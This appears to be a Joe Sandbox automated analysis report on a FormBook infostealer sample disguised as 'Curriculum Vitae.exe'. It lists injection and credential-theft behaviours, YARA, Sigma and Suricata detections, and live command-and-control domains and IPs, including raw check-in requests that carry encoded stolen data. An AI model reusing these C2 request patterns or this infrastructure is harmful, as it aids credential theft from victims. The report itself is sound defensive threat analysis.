Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Curriculum Vitae.exe

Overview

General Information

Sample name:Curriculum Vitae.exe
Analysis ID:1501087
MD5:eda3b2c20013e6a58d10ad852d39fd29
SHA1:56ff3fdfee53f3e37c14cf10bc3d4044535a9da0
SHA256:291ca7bba147041963c8d17b3504981dd2eb595945e7472d5e3e62d78f0fd6a7
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Curriculum Vitae.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\Curriculum Vitae.exe" MD5: EDA3B2C20013E6A58D10AD852D39FD29)
    • svchost.exe (PID: 1632 cmdline: "C:\Users\user\Desktop\Curriculum Vitae.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OAIexgManRWDie.exe (PID: 5776 cmdline: "C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regsvr32.exe (PID: 7064 cmdline: "C:\Windows\SysWOW64\regsvr32.exe" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
          • OAIexgManRWDie.exe (PID: 6584 cmdline: "C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5324 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2def3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x160a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ecf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16ea2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ParentImage: C:\Users\user\Desktop\Curriculum Vitae.exe, ParentProcessId: 6772, ParentProcessName: Curriculum Vitae.exe, ProcessCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ProcessId: 1632, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ParentImage: C:\Users\user\Desktop\Curriculum Vitae.exe, ParentProcessId: 6772, ParentProcessName: Curriculum Vitae.exe, ProcessCommandLine: "C:\Users\user\Desktop\Curriculum Vitae.exe", ProcessId: 1632, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-08-29T12:15:39.466977+0200
            SID:2855465
            Severity:1
            Source Port:55084
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:13.543047+0200
            SID:2855464
            Severity:1
            Source Port:55091
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:22.860493+0200
            SID:2855464
            Severity:1
            Source Port:55093
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:14:18.641798+0200
            SID:2855464
            Severity:1
            Source Port:55095
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:15:57.839714+0200
            SID:2855464
            Severity:1
            Source Port:55086
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:00.487795+0200
            SID:2855464
            Severity:1
            Source Port:55087
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:15:55.290457+0200
            SID:2855464
            Severity:1
            Source Port:55085
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:08.467911+0200
            SID:2855464
            Severity:1
            Source Port:55089
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:11.027129+0200
            SID:2855464
            Severity:1
            Source Port:55090
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:16.092689+0200
            SID:2855465
            Severity:1
            Source Port:55092
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:25.407496+0200
            SID:2855464
            Severity:1
            Source Port:55094
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-29T12:16:02.916430+0200
            SID:2855465
            Severity:1
            Source Port:55088
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Curriculum Vitae.exeReversingLabs: Detection: 65%
            Source: Curriculum Vitae.exeVirustotal: Detection: 60%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Curriculum Vitae.exeJoe Sandbox ML: detected
            Source: Curriculum Vitae.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OAIexgManRWDie.exe, 00000005.00000002.3269982810.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270006592.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: regsvr32.pdb source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: regsvr32.pdbGCTL source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D9DBBE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D6C2A2 FindFirstFileExW,0_2_00D6C2A2
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA68EE FindFirstFileW,FindClose,0_2_00DA68EE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DA698F
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D9D076
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D9D3A9
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DA9642
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DA979D
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DA9B2B
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DA5C97
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0293C270 FindFirstFileW,FindNextFileW,FindClose,6_2_0293C270
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then xor eax, eax6_2_02929A90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then pop edi6_2_02942391
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then mov ebx, 00000004h6_2_048B04DF

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55086 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55090 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55085 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:55092 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55091 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55089 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:55084 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55087 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:55088 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55094 -> 66.81.203.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55093 -> 66.81.203.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:55095 -> 66.81.203.200:80
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00DACE44
            Source: global trafficHTTP traffic detected: GET /zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f- HTTP/1.1Host: www.chinaen.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
            Source: global trafficHTTP traffic detected: GET /6u21/?QpGDsvFp=aL/4TjGztHWcUB/Ah5XMbJsPVjcLX5spIqygDBReB+gjFi+JNHxT0K0F5MtDhvjmRAZ0VF/vQduwy3cjjhNQXD5C3/i7fPsqWYlJ4opKyF5MG7GdSMwyyOQYqJ9RHJTdWA==&en=KRMtj8Zx1f- HTTP/1.1Host: www.marcoiozia.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
            Source: global trafficHTTP traffic detected: GET /2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f- HTTP/1.1Host: www.godoggyonbase.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
            Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.chinaen.org
            Source: global trafficDNS traffic detected: DNS query: www.marcoiozia.info
            Source: global trafficDNS traffic detected: DNS query: www.godoggyonbase.online
            Source: global trafficDNS traffic detected: DNS query: www.mediaplug.biz
            Source: unknownHTTP traffic detected: POST /6u21/ HTTP/1.1Host: www.marcoiozia.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.marcoiozia.infoCache-Control: max-age=0Content-Length: 209Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.marcoiozia.info/6u21/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 62 77 57 72 6e 4b 62 51 65 72 51 44 63 7a 77 30 66 4c 77 71 4c 2b 43 64 44 77 77 45 4b 59 46 50 4a 42 43 49 4e 6b 49 79 32 49 59 71 38 39 4e 45 68 74 62 30 55 54 73 6f 62 6e 44 64 56 39 32 58 74 47 41 5a 78 44 64 6a 64 44 70 59 67 34 2b 66 4e 76 77 51 54 2b 35 70 73 4f 4e 58 73 6b 78 6a 43 2b 32 63 54 62 34 75 37 2f 30 48 71 2b 42 4e 64 4d 57 53 4a 38 4a 39 30 49 75 78 77 35 4f 75 61 2b 6d 6e 7a 6a 78 31 35 75 35 64 75 6c 6b 33 66 43 58 33 38 46 41 74 49 72 33 6b 4a 2b 66 53 59 77 58 44 68 39 33 77 33 6c 39 2b 36 57 4d 4f 6f 35 78 78 33 4f 52 5a 73 2f 63 3d Data Ascii: QpGDsvFp=XJXYQUW+jG++bwWrnKbQerQDczw0fLwqL+CdDwwEKYFPJBCINkIy2IYq89NEhtb0UTsobnDdV92XtGAZxDdjdDpYg4+fNvwQT+5psONXskxjC+2cTb4u7/0Hq+BNdMWSJ8J90Iuxw5Oua+mnzjx15u5dulk3fCX38FAtIr3kJ+fSYwXDh93w3l9+6WMOo5xx3ORZs/c=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:15:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrAgzzFouJWtkbC1qarmqV8q4bD9HMroakga3SKJfMkUVYL3CIxfboisvzOEs1LNVf5JC6ULuYJ%2FqsJfM%2FxFQFbwzR1cAkz1EUxzW5oXVEQi%2FjD1XlMD2jF1aSYg3KdVk%2BE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babc7f3ee497ce2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 64 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa e6 89 be e5 88 b0 20 2d 20 e7 8e 8b e8 80 85 e8 8d a3 e8 80 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 73 77 69 70 65 72 2d Data Ascii: 1d1b<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-
